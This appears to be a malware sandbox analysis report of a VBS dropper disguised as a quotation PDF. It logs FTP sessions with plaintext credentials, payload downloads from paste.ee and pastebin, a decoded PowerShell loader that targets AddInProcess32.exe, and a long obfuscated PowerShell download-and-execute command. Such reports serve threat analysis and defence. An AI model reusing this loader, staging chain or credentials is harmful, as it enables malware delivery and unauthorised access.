                                                    2024-10-07 05:09:10 UTC16384INData Raw: 41 41 41 41 41 38 2f 2f 2f 37 50 41 44 46 4b 74 41 4d 55 6f 71 43 41 41 41 41 41 41 44 46 61 35 41 41 41 41 41 38 2f 2f 2f 37 50 41 41 41 41 41 2f 2f 2f 2f 51 44 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 46 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 47 54 57 67 49 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 55 35 41 43 41 41 41 45 51 47 54 57 67 49 41 55 30 66 4d 38 2f 2f 2f 2f 50 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 56 4f 56 41 41 41 41 42 6b 78 6b 46 49 43 41 46 39 33 4c 2f 2f 2f 2f 2f 44 77 51 53 4a 4a 41 41 41 41 44 41 41 41 41 41 38 2f 2f 2f 2f 50 41 41 41 41
                                                    Data Ascii: AAAAA8///7PADFKtAMUoqCAAAAAADFa5AAAAA8///7PAAAAA////QDAAAAw///v/AAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQGTWgIAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAYU5ACAAAEQGTWgIAU0fM8////PAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGVOVAAAABkxkFICAF93L/////DwQSJJAAAADAAAAA8////PAAAA
                                                    2024-10-07 05:09:10 UTC16384INData Raw: 42 42 6a 51 34 51 6a 4d 43 52 45 4d 42 46 44 4f 31 59 45 52 45 4a 7a 4e 7a 51 6a 52 78 67 44 52 30 4d 6a 4e 33 4d 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 56 55 51 79 4d 55 52 7a 51 45 52 46 68 7a 51 31 67 54 51 79 51 55 4f 78 51 55 52 79 45 45 4f 45 68 54 4f 7a 59 54 4e 32 4d 55 51 31 63 44 4f 7a 45 44 4d 31 59 45 4f 34 41 44 4e 78 4d 44 4d 79 45 54 4d 30 45 44 4f 46 5a 55 52 32 4d 55 4f 45 46 44 4f 78 6b 54 4d 45 4a 44 4f 47 4e 54 52 43 5a 54 4e 77 55 45
                                                    Data Ascii: BBjQ4QjMCREMBFDO1YEREJzNzQjRxgDR0MjN3MkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGVUQyMURzQERFhzQ1gTQyQUOxQURyEEOEhTOzYTN2MUQ1cDOzEDM1YEO4ADNxMDMyETM0EDOFZUR2MUOEFDOxkTMEJDOGNTRCZTNwUE
                                                    2024-10-07 05:09:10 UTC16384INData Raw: 59 30 33 70 51 77 61 6d 37 67 63 4a 53 4d 37 7a 56 33 53 71 76 42 39 6b 38 6c 57 58 41 36 37 6e 44 2f 61 39 43 6d 7a 39 65 35 43 32 34 69 4f 6b 4e 4f 68 77 32 37 6e 52 69 52 31 58 4d 76 70 61 34 4a 5a 44 51 70 54 6e 6b 7a 53 72 2f 53 36 50 33 36 6f 4a 61 72 6e 33 6f 55 61 39 42 2b 73 70 55 76 67 4e 59 71 73 6f 2b 7a 49 4f 52 48 63 32 4a 35 30 78 48 4f 44 6b 76 4c 53 66 73 67 74 56 77 2f 6a 47 67 79 50 6a 45 6a 61 36 6b 4a 79 52 55 69 6b 2b 52 41 58 75 5a 6d 36 73 57 77 32 4b 42 50 4f 30 33 5a 6f 55 73 33 67 73 77 4d 50 33 65 2b 79 53 64 6b 53 6f 74 64 63 2b 79 45 68 72 37 32 44 2b 53 72 45 4a 39 56 6f 78 52 41 43 68 58 4b 43 51 54 4d 57 68 51 49 55 4d 63 72 38 31 6b 48 2f 59 34 32 4f 2f 6f 5a 37 49 47 7a 39 79 44 6c 69 64 4c 75 76 66 30 73 6c 5a 37 55 4d
                                                    Data Ascii: Y03pQwam7gcJSM7zV3SqvB9k8lWXA67nD/a9Cmz9e5C24iOkNOhw27nRiR1XMvpa4JZDQpTnkzSr/S6P36oJarn3oUa9B+spUvgNYqso+zIORHc2J50xHODkvLSfsgtVw/jGgyPjEja6kJyRUik+RAXuZm6sWw2KBPO03ZoUs3gswMP3e+ySdkSotdc+yEhr72D+SrEJ9VoxRAChXKCQTMWhQIUMcr81kH/Y42O/oZ7IGz9yDlidLuvf0slZ7UM
                                                    2024-10-07 05:09:10 UTC16384INData Raw: 39 67 7a 61 4a 34 2f 2b 77 55 77 50 4c 65 56 6e 32 36 4e 41 41 30 6a 50 46 67 54 4c 52 64 2f 47 2f 77 33 41 6f 71 41 35 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 50 61 70 48 62 2f 36 53 51 49 38 72 38 36 4a 50 33 33 46 62 4e 41 5a 78 71 66 36 48 47 5a 65 2f 50 38 72 6d 41 63 62 5a 4e 53 44 63 4a 4a 44 6f 61 31 51 59 56 41 6a 77 6b 4a 51 57 4b 42 32 44 51 31 6b 49 46 47 66 70 7a 35 2f 48 38 41 41 41 41 41 41 51 41 2f 42 50 41 41 41 41 41 41 45 77 66 77 44 41 41 41 41 41 41 41 38 50 38 41 41 41 41 41 41 41 41 44 42 44 41 41 41 41 41 41 41 77 51 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 50 77 44 41 41 41 41 41 41 41 38 44 38 41 41 41 41 41 41 41
                                                    Data Ascii: 9gzaJ4/+wUwPLeVn26NAA0jPFgTLRd/G/w3AoqA5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwPapHb/6SQI8r86JP33FbNAZxqf6HGZe/P8rmAcbZNSDcJJDoa1QYVAjwkJQWKB2DQ1kIFGfpz5/H8AAAAAAQA/BPAAAAAAEwfwDAAAAAAA8P8AAAAAAAADBDAAAAAAAwQwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwPwDAAAAAAA8D8AAAAAAA
                                                    2024-10-07 05:09:10 UTC16384INData Raw: 39 79 55 69 36 53 6d 38 61 56 31 76 49 6e 61 72 4a 67 45 6f 41 30 4c 51 63 4d 32 5a 56 31 73 41 2f 6d 63 66 46 4a 4f 52 41 43 51 76 46 64 70 62 41 4b 6d 78 66 38 72 79 50 31 75 57 37 43 4b 41 39 71 30 57 5a 6d 2b 48 70 64 37 76 4c 62 43 6f 37 50 49 34 41 30 37 4a 45 43 70 44 43 56 4c 4f 2f 75 4d 2f 63 31 78 57 67 44 51 76 46 55 66 7a 6b 4c 4a 79 35 38 4c 7a 54 6a 4a 36 2b 41 49 41 39 75 43 5a 45 75 37 6a 67 6b 77 76 4e 7a 4b 55 2b 33 47 51 41 30 72 4e 76 5a 36 38 2f 7a 50 77 2f 36 73 68 2b 6c 51 50 41 44 51 76 39 55 68 64 67 55 73 55 42 2f 37 7a 66 70 71 66 78 42 4b 41 39 79 54 61 79 68 38 45 6c 48 30 76 51 33 68 49 4d 53 50 41 41 30 37 51 48 7a 79 54 34 39 64 6f 2f 43 4e 6a 59 78 6f 32 77 42 51 76 72 77 4b 72 41 6b 77 51 6c 2b 4c 30 37 6e 67 4f 2f 41 4e
                                                    Data Ascii: 9yUi6Sm8aV1vInarJgEoA0LQcM2ZV1sA/mcfFJORACQvFdpbAKmxf8ryP1uW7CKA9q0WZm+Hpd7vLbCo7PI4A07JECpDCVLO/uM/c1xWgDQvFUfzkLJy58LzTjJ6+AIA9uCZEu7jgkwvNzKU+3GQA0rNvZ68/zPw/6sh+lQPADQv9UhdgUsUB/7zfpqfxBKA9yTayh8ElH0vQ3hIMSPAA07QHzyT49do/CNjYxo2wBQvrwKrAkwQl+L07ngO/AN
                                                    2024-10-07 05:09:10 UTC16384INData Raw: 41 41 41 41 41 41 41 61 41 4d 48 41 70 42 41 62 41 63 47 41 75 42 51 5a 41 41 43 41 75 42 51 59 41 4d 47 41 70 42 67 63 41 55 47 41 74 42 51 59 41 41 41 41 41 41 67 62 41 45 47 41 6a 42 51 61 41 49 48 41 6c 42 51 62 41 45 47 41 46 68 4c 46 41 55 45 75 77 43 51 52 37 53 4c 41 46 68 4c 70 2f 41 4f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 50 2b 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 41 41 41 77 66 67 44 41 41 41 41 41 41 41 38 50 34 41 41 41 41 41 41 41 41 41 43 41 41 41 41 41 41 41 41 77 2f 77 44 41 41 41 41 41 41 41 38 48 38 41 41 41 41 41 41 41 41 2f 42 50 41 41 41 41 41 41 45 77 76 33 58 78 52 41 42 41 41 41 38 2f 2f 2f 2f 50 2b 41 41 41 41 2f 59 75 4c 43 35 76 2b 35 38 2b 50 4f 2f 62 76 2f 4c 59 78 4f 2b 7a 67 79 75 36 62 36 36 30
                                                    Data Ascii: AAAAAAAaAMHApBAbAcGAuBQZAACAuBQYAMGApBgcAUGAtBQYAAAAAAgbAEGAjBQaAIHAlBQbAEGAFhLFAUEuwCQR7SLAFhLp/AOAAAAAAAAAAAAAAAAAA8P+AAAAAAAAAABAAAAAAAwfgDAAAAAAA8P4AAAAAAAAACAAAAAAAAw/wDAAAAAAA8H8AAAAAAAA/BPAAAAAAEwv3XxRABAAA8////P+AAAA/YuLC5v+58+PO/bv/LYxO+zgyu6b660


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.549712188.114.96.34433200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-07 05:09:12 UTC43OUTGET /d/FwIIK/0 HTTP/1.1
                                                    Host: paste.ee
                                                    2024-10-07 05:09:13 UTC1197INHTTP/1.1 200 OK
                                                    Date: Mon, 07 Oct 2024 05:09:12 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Content-Length: 582
                                                    Connection: close
                                                    Cache-Control: max-age=2592000
                                                    strict-transport-security: max-age=63072000
                                                    x-frame-options: DENY
                                                    x-content-type-options: nosniff
                                                    x-xss-protection: 1; mode=block
                                                    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JaB19sEbywtJYDIAdpBmZx9X5flwwB75QDu%2F49HuLmB8r3cysbdrvXmqH%2F9FjTp3GLo4raw578w5ILP7%2FKN1xmrW2aEpcUgsveMOgcQjNs9MERRzxEZrXpoPeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8ceb60b219144338-EWR
                                                    2024-10-07 05:09:13 UTC172INData Raw: 24 7a 73 62 44 74 20 3d 20 27 43 3a 5c 57 69 6e 64 6f 77 73 5c 4d 69 63 72 6f 73 6f 66 74 2e 4e 45 54 5c 27 20 2b 20 27 46 72 61 6d 65 77 6f 72 6b 5c 76 34 2e 30 2e 33 30 33 31 39 5c 27 20 2b 20 27 41 64 64 49 6e 50 72 6f 63 65 73 73 33 32 2e 65 78 65 27 3b 0a 0a 24 58 6f 68 73 4b 20 3d 20 22 3f 3f 25 79 7a 58 56 4d 25 22 0a 0a 24 55 65 62 54 61 20 3d 20 27 e2 86 93 3a e2 86 93 27 3b 0a 24 58 4b 76 48 76 20 3d 20 27 41 27 3b 0a 0a 24 57 59 76 74 74 20 3d 20 27 25 71 6c 78 4b 50 25 27 2e 72 65 70 6c 61 63 65 28
                                                    Data Ascii: $zsbDt = 'C:\Windows\Microsoft.NET\' + 'Framework\v4.0.30319\' + 'AddInProcess32.exe';$XohsK = "??%yzXVM%"$UebTa = ':';$XKvHv = 'A';$WYvtt = '%qlxKP%'.replace(
                                                    2024-10-07 05:09:13 UTC410INData Raw: 20 24 55 65 62 54 61 2c 20 24 58 4b 76 48 76 20 29 3b 0a 5b 42 79 74 65 5b 5d 5d 20 24 6c 61 57 77 4a 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 20 24 57 59 76 74 74 20 29 3b 0a 0a 24 72 51 43 4f 4e 20 3d 20 27 25 6e 6b 47 4d 76 25 27 2e 72 65 70 6c 61 63 65 28 20 24 55 65 62 54 61 2c 20 24 58 4b 76 48 76 20 29 3b 0a 5b 42 79 74 65 5b 5d 5d 20 24 61 6e 4b 6c 6f 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 20 24 72 51 43 4f 4e 20 29 3b 0a 0a 24 61 7a 45 51 61 20 3d 20 22 43 6c 61 73 73 31 22 3b 0a 24 63 50 43 51 6f 20 3d 20 22 52 75 6e 22 20 3b 0a 24 6e 6c 66 79 77 20 3d 20 22 43 6c 61 73 73 4c 69 62 72 61 72 79 31 2e
                                                    Data Ascii: $UebTa, $XKvHv );[Byte[]] $laWwJ = [System.Convert]::FromBase64String( $WYvtt );$rQCON = '%nkGMv%'.replace( $UebTa, $XKvHv );[Byte[]] $anKlo = [System.Convert]::FromBase64String( $rQCON );$azEQa = "Class1";$cPCQo = "Run" ;$nlfyw = "ClassLibrary1.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.549725104.20.4.2354437548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-07 05:09:15 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                                    Host: pastebin.com
                                                    Connection: Keep-Alive
                                                    2024-10-07 05:09:16 UTC388INHTTP/1.1 200 OK
                                                    Date: Mon, 07 Oct 2024 05:09:16 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    x-frame-options: DENY
                                                    x-content-type-options: nosniff
                                                    x-xss-protection: 1;mode=block
                                                    cache-control: public, max-age=1801
                                                    CF-Cache-Status: MISS
                                                    Last-Modified: Mon, 07 Oct 2024 05:09:16 GMT
                                                    Server: cloudflare
                                                    CF-RAY: 8ceb60c67f5f43dc-EWR
                                                    2024-10-07 05:09:16 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                                    Data Ascii: 6false,
                                                    2024-10-07 05:09:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.549759104.20.4.2354437912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-07 05:09:20 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                                    Host: pastebin.com
                                                    Connection: Keep-Alive
                                                    2024-10-07 05:09:21 UTC395INHTTP/1.1 200 OK
                                                    Date: Mon, 07 Oct 2024 05:09:21 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    x-frame-options: DENY
                                                    x-content-type-options: nosniff
                                                    x-xss-protection: 1;mode=block
                                                    cache-control: public, max-age=1801
                                                    CF-Cache-Status: HIT
                                                    Age: 5
                                                    Last-Modified: Mon, 07 Oct 2024 05:09:16 GMT
                                                    Server: cloudflare
                                                    CF-RAY: 8ceb60e68ae043da-EWR
                                                    2024-10-07 05:09:21 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                                    Data Ascii: 6false,
                                                    2024-10-07 05:09:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.549813104.20.4.2354438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-07 05:09:30 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                                    Host: pastebin.com
                                                    Connection: Keep-Alive
                                                    2024-10-07 05:09:30 UTC396INHTTP/1.1 200 OK
                                                    Date: Mon, 07 Oct 2024 05:09:30 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    x-frame-options: DENY
                                                    x-content-type-options: nosniff
                                                    x-xss-protection: 1;mode=block
                                                    cache-control: public, max-age=1801
                                                    CF-Cache-Status: HIT
                                                    Age: 14
                                                    Last-Modified: Mon, 07 Oct 2024 05:09:16 GMT
                                                    Server: cloudflare
                                                    CF-RAY: 8ceb611f2fcc8ca5-EWR
                                                    2024-10-07 05:09:30 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                                    Data Ascii: 6false,
                                                    2024-10-07 05:09:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                    Oct 7, 2024 07:09:00.482204914 CEST2149704191.252.83.213192.168.2.5220 "Servico de FTP da Locaweb"
                                                    Oct 7, 2024 07:09:00.486345053 CEST4970421192.168.2.5191.252.83.213USER desckvbrat1
                                                    Oct 7, 2024 07:09:00.705430984 CEST2149704191.252.83.213192.168.2.5331 Username ok, send password.
                                                    Oct 7, 2024 07:09:00.714291096 CEST4970421192.168.2.5191.252.83.213PASS developerpro21578Jp@@
                                                    Oct 7, 2024 07:09:00.938736916 CEST2149704191.252.83.213192.168.2.5230 Login successful.
                                                    Oct 7, 2024 07:09:01.160609961 CEST2149704191.252.83.213192.168.2.5501 Invalid argument.
                                                    Oct 7, 2024 07:09:01.160770893 CEST4970421192.168.2.5191.252.83.213PWD
                                                    Oct 7, 2024 07:09:01.379470110 CEST2149704191.252.83.213192.168.2.5257 "/" is the current directory.
                                                    Oct 7, 2024 07:09:01.379719019 CEST4970421192.168.2.5191.252.83.213TYPE I
                                                    Oct 7, 2024 07:09:01.598306894 CEST2149704191.252.83.213192.168.2.5200 Type set to: Binary.
                                                    Oct 7, 2024 07:09:01.598573923 CEST4970421192.168.2.5191.252.83.213PASV
                                                    Oct 7, 2024 07:09:01.817627907 CEST2149704191.252.83.213192.168.2.5227 Entering passive mode (191,252,83,213,237,38).
                                                    Oct 7, 2024 07:09:01.825695992 CEST4970421192.168.2.5191.252.83.213RETR Upcrypter/01/DLL01.txt
                                                    Oct 7, 2024 07:09:02.044852972 CEST2149704191.252.83.213192.168.2.5150 File status okay. About to open data connection.
                                                    Oct 7, 2024 07:09:02.433752060 CEST2149704191.252.83.213192.168.2.5226 Transfer complete.
                                                    Oct 7, 2024 07:09:05.943299055 CEST2149707191.252.83.213192.168.2.5220 "Servico de FTP da Locaweb"
                                                    Oct 7, 2024 07:09:05.943481922 CEST4970721192.168.2.5191.252.83.213USER desckvbrat1
                                                    Oct 7, 2024 07:09:06.165713072 CEST2149707191.252.83.213192.168.2.5331 Username ok, send password.
                                                    Oct 7, 2024 07:09:06.199182987 CEST4970721192.168.2.5191.252.83.213PASS developerpro21578Jp@@
                                                    Oct 7, 2024 07:09:06.426799059 CEST2149707191.252.83.213192.168.2.5230 Login successful.
                                                    Oct 7, 2024 07:09:06.648540974 CEST2149707191.252.83.213192.168.2.5501 Invalid argument.
                                                    Oct 7, 2024 07:09:06.648839951 CEST4970721192.168.2.5191.252.83.213PWD
                                                    Oct 7, 2024 07:09:06.870255947 CEST2149707191.252.83.213192.168.2.5257 "/" is the current directory.
                                                    Oct 7, 2024 07:09:06.870532036 CEST4970721192.168.2.5191.252.83.213TYPE I
                                                    Oct 7, 2024 07:09:07.093327045 CEST2149707191.252.83.213192.168.2.5200 Type set to: Binary.
                                                    Oct 7, 2024 07:09:07.095367908 CEST4970721192.168.2.5191.252.83.213PASV
                                                    Oct 7, 2024 07:09:07.317408085 CEST2149707191.252.83.213192.168.2.5227 Entering passive mode (191,252,83,213,237,131).
                                                    Oct 7, 2024 07:09:07.323286057 CEST4970721192.168.2.5191.252.83.213RETR Upcrypter/01/Rumpe.txt
                                                    Oct 7, 2024 07:09:07.545727968 CEST2149707191.252.83.213192.168.2.5150 File status okay. About to open data connection.
                                                    Oct 7, 2024 07:09:07.951055050 CEST2149707191.252.83.213192.168.2.5226 Transfer complete.
                                                    Oct 7, 2024 07:09:11.204852104 CEST4970721192.168.2.5191.252.83.213PASV
                                                    Oct 7, 2024 07:09:11.426877975 CEST2149707191.252.83.213192.168.2.5227 Entering passive mode (191,252,83,213,235,199).
                                                    Oct 7, 2024 07:09:11.437011957 CEST4970721192.168.2.5191.252.83.213RETR Upcrypter/01/Entry.txt
                                                    Oct 7, 2024 07:09:11.668380976 CEST2149707191.252.83.213192.168.2.5150 File status okay. About to open data connection.
                                                    Oct 7, 2024 07:09:12.072319031 CEST2149707191.252.83.213192.168.2.5226 Transfer complete.

                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:01:08:54
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs"
                                                    Imagebase:0x7ff6728a0000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:01:08:54
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8Acg' + [char]66 + 'iAC4AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC4AcA' + [char]66 + '0AGYAQAAxAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALwAvADoAcA' + [char]66 + '0AGYAJwAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAIAA9ACAAZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAA7ACkAJw' + [char]66 + 'AAEAAcA' + [char]66 + 'KADgANwA1ADEAMg' + [char]66 + 'vAHIAcA' + [char]66 + 'yAGUAcA' + [char]66 + 'vAGwAZQ' + [char]66 + '2AGUAZAAnACwAKQApADkANAAsADYAMQAxACwANwA5ACwANAAxADEALAA4ADkALAA4ADEAMQAsADcAMAAxACwAOQA5ACwANQAxADEALAAxADAAMQAsADAAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAKA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAGsAcg' + [char]66 + 'vAHcAdA' + [char]66 + 'lAE4ALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8ALQ' + [char]66 + '3AGUAbgAgAD0AIA' + [char]66 + 'zAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 